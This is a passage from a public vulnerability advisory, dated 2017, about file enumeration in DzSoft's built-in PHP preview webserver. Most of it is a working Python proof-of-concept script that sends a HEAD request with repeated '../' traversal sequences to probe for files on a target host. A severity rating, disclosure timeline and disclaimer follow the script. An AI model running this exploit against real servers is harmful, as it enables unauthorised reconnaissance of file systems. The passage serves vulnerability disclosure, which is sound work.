+3) Start DzSofts built-in webserver to preview PHP file + +Then, + + +import socket + +print 'DzSoft File Enumeration POC' +print 'Hyp3rlinx / ApparitionSec' + +IP=raw_input("[IP]>") +PORT=int(raw_input("[PORT]>")) +DEPTH=int(raw_input("[DEPTH]>")) +FILE=raw_input("[FILE]>") +ENUM="HEAD "+"/\\" +ENUM+="../"*DEPTH+FILE+ " HTTP/1.0\r\n\r\n" + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect((IP,PORT)) +s.send(ENUM) +print 'Enumerating file:' +print ENUM +output = s.recv(128) +print output +s.close() + + + + +Network Access: +=============== +Remote + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +================================== +Vendor Notification: No reply +March 27, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file